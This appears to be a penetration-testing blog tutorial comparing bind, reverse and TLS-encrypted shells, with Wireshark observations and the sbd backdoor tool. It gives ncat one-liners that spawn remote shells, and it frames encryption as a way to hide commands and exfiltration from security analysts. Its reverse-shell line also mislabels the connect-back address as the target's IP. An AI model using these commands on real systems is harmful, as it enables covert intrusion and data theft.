Bind vs Reverse vs Encrypted Shells — Which Should You Use?

5 min readOct 2, 2019


Bind Shells

Bind shells have the listener running on the target and the attacker connect to the listener in order to gain a remote shell.

Netcat bind shell

There is a security issue with bind shells, though, and that is the fact that anyone can connect to the bind shell and run commands. A malicious actor can take advantage of this easily.

There is another key issue with bind shells, and that is the fact that if we were trying to connect to an internal host’s bind shell, 2 things could prevent us:
1. Firewalls often have strict inbound traffic filtering
2. NAT/PAT translation process changes the private IP address (RFC 1918) into different public IP addresses, and can even change the port

We can try and resolve issue 1 by setting the target’s bind shell to listen on a popular port, such as 443, but it is possible that the firewall blocks external connections from even the most popular ports. Is there a better way to gain a remote shell from a target, without having to face the security, firewall and NAT/PAT issues?

Reverse Shells

Netcat reverse shell

The answer is — yes!
Reverse shells have the listener running on the attacker and the target connects to the attacker with a shell.

Reverse shells solve a lot of headache that bind shells caused us, let’s see how it has solved each of the 3 issues.
1. Reverse shells remove the need for a listener on the target machine, which means we don’t have to leave the target vulnerable to other malicious actors.
2. Reverse shells can use popular ports (e.g. 80, 443) which are usually allowed on egress connections from an internal network to an external network, bypassing firewall restrictions.
3. We do not need to specify the remote host’s IP address, and therefore do not have to face NAT/PAT address translation.

Both bind and reverse shells can be gained through common tools such as Netcat, and as a payload alongside an exploit in exploit frameworks like Metasploit.

Encrypted Shells

Both bind and reverse shells communicate in plaintext. That means anyone can sniff the network and easily see the bidirectional communications. And what’s worse, security analysts can look at what commands you executed on the target, what files you exfiltrated or uploaded to the target, as well as figure out what you were trying to do.

Let’s take a look at this plaintext communication in Wireshark.

Bind shell plaintext communication

This is a very basic example, but it clearly demonstrates the insecure nature of plaintext shells. We have captured 20 packets, and following the TCP stream shows us both the commands that we executed and the output the target returned. In this case, it seems like the attacker (in red) has gained root privileges on the target (in blue), has found a .txt file containing several passwords and is attempting to exfiltrate this file by setting up a HTTP server that listens on port 443 (quick note: HTTP is another plaintext protocol).

This is exactly where encrypted shells kick in. Encrypted shells, as the name suggests, encrypt the communication, thereby disallowing intermediary sniffers to decipher what we are trying to accomplish on the target machine.

Let’s take a look at this encrypted communication in Wireshark.

Reverse encrypted shell encrypted communication

The first thing to note is the inclusion of a new protocol — TLS, or Transport Layer Security. Simply put, TLS is an improved, newer version of SSL (Secure Sockets Layer) and provides strong data encryption. We can clearly see TLS’s effects on the communication by following the TCP stream. We ran the same commands as the unencrypted shell we captured above, but we see a jumbled mess of numbers, letters and symbols! This prevents anyone other than the attacker and target from deciphering the communication.

But wait, hold on, this idea of “secure” shells seems familiar — yes! That’s because SSH, or Secure Shell, also provides an encrypted shell (except not for malicious purposes)!

Now let’s explore how we can actually create these encrypted shells.

Using Ncat and SBD to Generate Encrypted Shells

We’ve already seen how Ncat can be used to provide IP whitelisting to add security to bind shells (, check Ncat Bind Shell IP Whitelisting section), so now let’s look at one more security feature of Ncat, which is its ability to generate encrypted shells.

Ncat uses SSL/TLS to create a secure connection to the target, as shown in the Wireshark capture above.

Bind shells:
Target: ncat -nvlp <port> -e {/bin/bash | cmd.exe} --ssl
Attacker: ncat -nv <target-ip> <port>--ssl

Reverse shells:
Target: ncat -nv <target-ip> <port> -e {/bin/bash | cmd.exe} --ssl
Attacker: ncat -nvlp <port>--ssl

Ncat encrypted reverse shell

sbd, or Secure Back Door, is another tool that is used to generate shells with strong encryption (AES-CBC-128 & HMAC-SHA1). It uses a similar syntax as Ncat, except it doesn’t use SSL/TLS, and therefore don’t have the --ssl option to specify an encrypted shell. Instead, the option to enable encryption is -c on, which is on by default, so it does not need to be specified.

sbd encrypted bind shell

Something to note is the fact that when Netcat or Ncat tries to connect to an sbd listener, authentication fails and it gets no response when commands are sent. Same goes for when there is a Ncat SSL listener and Netcat or Ncat attempts to gain a bind shell. Specifying the --ssl option also causes a Connection Refused error.

sbd and Ncat don’t mix!

Further Digging

Offensive Netcat/Ncat:

